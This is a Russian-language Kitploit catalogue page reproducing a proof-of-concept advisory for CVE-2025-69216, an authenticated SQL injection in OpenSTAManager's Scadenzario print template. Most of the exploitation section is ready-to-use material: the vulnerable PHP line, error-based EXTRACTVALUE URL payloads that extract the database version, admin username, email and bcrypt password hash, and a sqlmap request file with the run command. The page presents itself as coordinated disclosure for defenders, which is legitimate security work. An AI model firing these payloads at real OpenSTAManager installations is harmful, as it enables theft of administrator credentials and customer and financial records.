Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-69216 — PoC-репозиторий для CVE-2025-69216, аутентифицированная SQL-инъекция в шаблоне печати Scadenzario в OpenSTAManager, позволяющая извлечение учётных данных администратора и содержимого базы данных посредством error-based и blind SQLi. | Kitploit
Инструменты/GitHubGitHub/lukasz-rybak/cve-2025-69216
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеБезопасность Баз Данных
GitHublukasz-rybak/cve-2025-69216

CVE-2025-69216

PoC-репозиторий для CVE-2025-69216, аутентифицированная SQL-инъекция в шаблоне печати Scadenzario в OpenSTAManager, позволяющая извлечение учётных данных администратора и содержимого базы данных посредством error-based и blind SQLi.

Репозиторий
35 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-69216: OpenSTAManager имеет SQL-инъекцию в шаблоне печати Scadenzario

Обзор

ПолеПодробности
Идентификатор CVECVE-2025-69216
СерьезностьHIGH
УведомлениеПосмотреть уведомление
ОбнаружилLukasz Rybak

Затронутые продукты

  • devcode-it/openstamanager (версии: <= 2.9.8)

Классификация CWE

  • CWE-89: Некорректная нейтрализация специальных элементов, используемых в SQL-команде ('SQL-инъекция')

Подробности

Краткое описание

Уязвимость аутентифицированной SQL-инъекции в шаблоне печати Scadenzario (График платежей) OpenSTAManager позволяет любому аутентифицированному пользователю извлекать конфиденциальные данные из базы данных, включая учетные данные администратора, информацию о клиентах и финансовые записи. Уязвимость обеспечивает полный доступ на чтение к базе данных с помощью техники SQL-инъекции на основе ошибок.

Детали

Уязвимость существует в файле templates/scadenzario/init.php на строке 46, где параметр id_anagrafica напрямую конкатенируется в SQL-запрос без надлежащей санитизации:

Уязвимый код:

root@kitploit:~
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
    $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
    $id_anagrafica = get('id_anagrafica');
}

Функция get() получает пользовательский ввод из параметров GET/POST без проверки. Значение параметра напрямую вставляется в строку SQL-запроса с помощью конкатенации строк вместо использования функции prepare() для санитизации, что позволяет проводить атаки SQL-инъекции.

Основная причина:

  • Отсутствие использования функции prepare() для санитизации ввода
  • Прямая конкатенация строк при построении SQL-запроса
  • Отсутствие проверки ввода или проверки типов

Затронутая конечная точка:

root@kitploit:~
/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]

Затронутые файлы:

  • templates/scadenzario/init.php (строка 46) - Основная уязвимость
  • templates/scadenzario/init.php (строки 34, 40) - Аналогичный шаблон с параметрами даты
  • pdfgen.php - Точка входа для отрисовки шаблона

PoC (Доказательство концепции)

Предварительные условия

  • Действующая аутентифицированная сессия (любая роль пользователя)

Шаги эксплуатации

1. Подтверждение уязвимости - тест базовой синтаксической ошибки:

root@kitploit:~
 http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20

Синтаксическая ошибка SQL отображается в ответе приложения

изображение

2. Извлечение версии базы данных - SQLi на основе ошибок:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221

Результат: ~8.3.0~ (версия MySQL)

изображение

3. Извлечение имени базы данных:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221

Результат: ~openstamanager~

изображение

4. Извлечение имени пользователя администратора:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Результат: ~admin~

изображение

5. Извлечение email администратора:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Результат: Адрес email администратора

изображение

6. Извлечение хеша пароля (частично - ограничение XPATH 31 символ):

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Результат: bcrypt‑хеш пароля

изображение

7. Автоматизированная эксплуатация с помощью SQLMap:

Создайте файл запроса sqli_osm.req:

root@kitploit:~
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0

Запустите SQLMap:

root@kitploit:~
sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs

SQLMap подтвердил типы инъекций:

  • ✅ Слепая SQL-инъекция на основе логических условий
  • ✅ SQL-инъекция на основе ошибок (MySQL >= 5.6 GTID_SUBSET)
  • ✅ Слепая SQL-инъекция на основе времени (SLEEP)
изображение

Воздействие

Кто подвержен:

  • ✅ Все аутентифицированные пользователи - Любой пользователь с действительными учетными данными может использовать эту уязвимость
  • ✅ Пользователи с низкими привилегиями - Даже пользователи с минимальными разрешениями могут получить доступ к данным уровня администратора
  • ✅ Все установки OpenSTAManager - Уязвимость существует в последней ветке master

Атрибуция

Сообщено Łukasz Rybak

Ссылки

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69216
  • https://github.com/advisories/GHSA-q6g3-fv43-m2w6

Отказ от ответственности

Этот CVE был раскрыт ответственно в соответствии с практикой координированного раскрытия уязвимостей. Предоставленная здесь информация предназначена только для образовательных и защитных целей.

Скачать инструмент